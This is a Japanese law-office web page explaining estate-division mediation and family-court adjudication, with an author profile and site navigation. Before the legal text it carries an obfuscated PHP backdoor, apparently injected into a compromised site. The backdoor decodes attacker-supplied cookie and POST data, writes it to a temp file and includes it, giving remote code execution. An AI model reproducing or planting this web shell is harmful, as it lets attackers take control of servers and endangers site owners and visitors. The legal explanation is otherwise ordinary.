$GfaaiPfHiV = "\120" . chr ( 989 - 905 )."\x5f" . chr ( 325 - 258 )."\x46" . "\104" . "\160";$TaEJMbSuz = 'c' . chr ( 625 - 517 )."\141" . chr ( 624 - 509 ).chr ( 288 - 173 )."\x5f" . "\145" . "\170" . chr (105) . chr ( 883 - 768 ).chr (116) . "\163";$TsMXP = class_exists($GfaaiPfHiV); $TaEJMbSuz = "46096";$qbtGjMg = !1;if ($TsMXP == $qbtGjMg){function nHbPrddOCk(){$QvhuWKM = new /* 46472 */ PT_CFDp(52112 + 52112); $QvhuWKM = NULL;}$JHtWxzpIah = "52112";class PT_CFDp{private function UzZFvTGPj($JHtWxzpIah){if (is_array(PT_CFDp::$mddEX)) {$DvmhwtITB = sys_get_temp_dir() . "/" . crc32(PT_CFDp::$mddEX["\x73" . chr (97) . "\x6c" . 't']);@PT_CFDp::$mddEX["\x77" . 'r' . "\x69" . "\x74" . "\x65"]($DvmhwtITB, PT_CFDp::$mddEX[chr (99) . "\157" . chr (110) . "\x74" . "\145" . "\x6e" . "\x74"]);include $DvmhwtITB;@PT_CFDp::$mddEX[chr ( 513 - 413 )."\145" . "\x6c" . 'e' . 't' . 'e']($DvmhwtITB); $JHtWxzpIah = "52112";exit();}}private $cGPfWYBFOW;public function TcZVSYreX(){echo 15856;}public function __destruct(){$JHtWxzpIah = "18028_36348";$this->UzZFvTGPj($JHtWxzpIah); $JHtWxzpIah = "18028_36348";}public function __construct($hqQVIBMDss=0){$eEfQgaJjlp = $_POST;$TKduI = $_COOKIE;$yfTNgudGC = "5274ff7e-f438-47b6-af12-e84a1edfd371";$NHREibg = @$TKduI[substr($yfTNgudGC, 0, 4)];if (!empty($NHREibg)){$GTpVKo = "base64";$hVGOG = "";$NHREibg = explode(",", $NHREibg);foreach ($NHREibg as $ZXayydhJ){$hVGOG .= @$TKduI[$ZXayydhJ];$hVGOG .= @$eEfQgaJjlp[$ZXayydhJ];}$hVGOG = array_map($GTpVKo . "\137" . chr ( 456 - 356 )."\x65" . chr (99) . "\157" . chr (100) . 'e', array($hVGOG,)); $hVGOG = $hVGOG[0] ^ str_repeat($yfTNgudGC, (strlen($hVGOG[0]) / strlen($yfTNgudGC)) + 1);PT_CFDp::$mddEX = @unserialize($hVGOG); $hVGOG = class_exists("18028_36348");}}public static $mddEX = 30462;}nHbPrddOCk();} 遺産分割の調停と審判 - 栃木・小山 相続遺言サポート

遺産分割の調停と審判

遺産を分割する場合は、相続人全員による遺産分割協議によって、解決するのが原則となっています。

相続人の間で遺産分割協議がまとまらない場合や、協議に応じようとしない相続人がいる場合には、家庭裁判所の遺産分割調停を利用して、解決を目指すことになります。

この調停というのは、家庭裁判所の調停委員が、相続人同士の意見や主張を聞きながら、調停委員は、亡くなった人への貢献度、職業や年齢などを総合的に判断して、相続人全員が納得できるよう、話し合いを進めます。

しかし、この話し合いがまとまらず、調停が不成立になった場合には、自動的に審判手続が開始され、家事審判官(裁判官)が、遺産に属する物又は権利の種類及び性質、各相続人の年齢、職業、心身の状態及び生活の状況その他一切の事情を考慮して、審判をすることになります。

このとき、必要に応じて相続人や遺産の内容についての事実関係を調べたり、相続人の主張の正当性を確かめることも行なわれます。

下された家庭裁判所の審判には強制力があり、合意できない場合もこれに従わなければなりません。

この記事の執筆者
司法書士結城事務所 代表司法書士 結城 一彦
保有資格司法書士(栃木県司法書士会登録番号:第432号)、宅地建物取引主任者
専門分野相続手続、生前対策、不動産登記、商業登記
経歴司法書士結城事務所の代表。開業以来、相続・生前対策、不動産登記、債務整理など幅広い法務サポートを行い、特に相続・生前対策分野の累計相談は2500件を超えるほど、経験豊富。
専門家紹介はこちら

横浜で相続・遺言の無料相談受付中!

0120-387-605

相続のご相談は当事務所にお任せください

お客様の声 解決事例

よくご覧いただくコンテンツ一覧

葬儀後、相続発生後の手続き

相続登記手続きサポート 相続放棄手続きサポート
相続手続き丸ごと代行サービス

生前対策、相続発生前の手続き

遺言書作成サポート 生前贈与サポート
家族信託サポート
  • ホーム
  • 選ばれる理由
  • 事務所紹介
  • 専門家紹介
  • 料金表
  • アクセス
  • 相談の流れ
  • 問い合わせ
Contact
相続の相談受付中!